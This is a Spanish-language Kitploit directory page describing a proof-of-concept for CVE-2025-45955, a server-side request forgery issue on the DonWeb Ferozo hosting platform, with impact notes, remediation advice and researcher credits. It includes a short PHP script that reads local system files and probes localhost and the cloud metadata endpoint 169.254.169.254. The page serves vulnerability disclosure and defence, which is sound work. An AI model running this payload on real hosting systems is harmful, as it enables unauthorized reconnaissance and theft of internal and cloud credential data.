Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-45955 — Exploit de prueba de concepto para CVE-2025-45955 que demuestra Server-Side Request Forgery (SSRF) en la plataforma de hosting DonWeb Ferozo, permitiendo el mapeo de infraestructura interna y la enumeración de metadatos en la nube. | Kitploit
Herramientas/GitHubGitHub/surendrapuppala7/cve-2025-45955
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebSeguridad en la Nube
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Exploit de prueba de concepto para CVE-2025-45955 que demuestra Server-Side Request Forgery (SSRF) en la plataforma de hosting DonWeb Ferozo, permitiendo el mapeo de infraestructura interna y la enumeración de metadatos en la nube.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
13hace 8 mesesAún no revisado

CVE-2025-45955

Falsificación de solicitudes del lado del servidor en DonWeb Ferozo (CVE-2025-45955)

Descripción

Un atacante puede explotar esta vulnerabilidad subiendo y ejecutando un archivo PHP especialmente manipulado en la plataforma de hosting Ferozo. Cuando se accede a él, el archivo lanza una serie de intentos de SSRF dirigidos a servicios internos (como 127.0.0.1, 169.254.169.254 o endpoints de service mesh), archivos locales (p. ej., file:///etc/passwd) y endpoints conocidos de metadatos en la nube. El script recopila respuestas o mensajes de error, lo que permite al atacante mapear la infraestructura interna, enumerar servicios accesibles y recopilar información sensible para una explotación posterior.

Prueba de Concepto (PoC)

El siguiente código demuestra la vulnerabilidad:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Componente Afectado

  • Plataforma de hosting Ferozo (DonWeb)
  • Entornos basados en PHP que permiten la ejecución de archivos PHP subidos por el usuario o controlados por el usuario

Impacto

  • Divulgación de información: Filtra IPs internas, contenidos de archivos, endpoints de metadatos en la nube
  • Reconocimiento de infraestructura: Permite la enumeración de puertos y servicios (Docker, Kubelet, etc.)
  • Potencial de explotación en la nube: Sondea endpoints de metadatos conocidos como AWS, GCP y Alibaba
  • Oportunidad de encadenamiento: Puede combinarse con otras vulnerabilidades locales para RCE o pivoting

Remediación

  • Restringir las funciones de inclusión de archivos y acceso a URL (file_get_contents, fopen, etc.)
  • Bloquear el acceso a rangos de IP internos (127.0.0.0/8, 169.254.169.254, etc.) mediante reglas de firewall de salida
  • Auditar y sanitizar las entradas de usuario que puedan influir en rutas de archivo o URLs

ID de CVE

CVE-2025-45955


Descubridor

Reportado por [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]

Descargar herramienta